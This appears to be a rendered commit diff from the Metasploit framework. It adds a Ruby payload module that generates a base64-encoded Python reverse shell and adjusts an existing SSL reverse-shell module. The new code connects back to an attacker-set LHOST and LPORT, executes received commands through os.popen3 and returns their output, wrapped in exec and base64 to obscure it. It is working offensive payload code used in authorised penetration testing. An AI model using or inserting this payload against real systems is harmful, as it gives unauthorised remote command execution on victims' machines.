Compat
parent
bf52c0b888
commit
c032b8ce8e
|
@ -0,0 +1,68 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_tcp_ssl'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Command Shell, Reverse TCP (via python)',
|
||||
'Description' => 'Creates an interactive shell via python, encodes with base64 by design. Compat with 2.3.3',
|
||||
'Author' => 'Ben Campbell', # Based on RageLtMan's reverse_ssl
|
||||
'License' => BSD_LICENSE,
|
||||
'Platform' => 'python',
|
||||
'Arch' => ARCH_PYTHON,
|
||||
'Handler' => Msf::Handler::ReverseTcp,
|
||||
'Session' => Msf::Sessions::CommandShell,
|
||||
'PayloadType' => 'python',
|
||||
'Payload' =>
|
||||
{
|
||||
'Offsets' => { },
|
||||
'Payload' => ''
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
#
|
||||
# Constructs the payload
|
||||
#
|
||||
def generate
|
||||
super + command_string
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the command string to use for execution
|
||||
#
|
||||
def command_string
|
||||
cmd = ''
|
||||
dead = Rex::Text.rand_text_alpha(2)
|
||||
# Set up the socket
|
||||
cmd << "import socket,os\n"
|
||||
cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
|
||||
cmd << "so.connect(('#{datastore['LHOST']}',#{ datastore['LPORT']}))\n"
|
||||
# The actual IO
|
||||
cmd << "#{dead}=False\n"
|
||||
cmd << "while not #{dead}:\n"
|
||||
cmd << "\tdata=so.recv(1024)\n"
|
||||
cmd << "\tif len(data)==0:\n\t\t#{dead}=True\n"
|
||||
cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
|
||||
cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
|
||||
cmd << "\tso.send(stdout_value)\n"
|
||||
|
||||
# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
|
||||
cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
|
||||
|
||||
cmd
|
||||
end
|
||||
|
||||
end
|
||||
|
|
@ -15,12 +15,12 @@ module Metasploit3
|
|||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Unix Command Shell, Reverse TCP SSL (via python)',
|
||||
'Name' => 'Command Shell, Reverse TCP SSL (via python)',
|
||||
'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
|
||||
'Author' => 'RageLtMan',
|
||||
'License' => BSD_LICENSE,
|
||||
'Platform' => 'python',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Arch' => ARCH_PYTHON,
|
||||
'Handler' => Msf::Handler::ReverseTcpSsl,
|
||||
'Session' => Msf::Sessions::CommandShell,
|
||||
'PayloadType' => 'python',
|
||||
|
@ -36,8 +36,7 @@ module Metasploit3
|
|||
# Constructs the payload
|
||||
#
|
||||
def generate
|
||||
vprint_good(command_string)
|
||||
return super + command_string
|
||||
super + command_string
|
||||
end
|
||||
|
||||
#
|
||||
|
@ -60,11 +59,10 @@ module Metasploit3
|
|||
cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
|
||||
cmd += "\ts.send(stdout_value)\n"
|
||||
|
||||
# The *nix shell wrapper to keep things clean
|
||||
# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
|
||||
cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
|
||||
return cmd
|
||||
|
||||
cmd
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue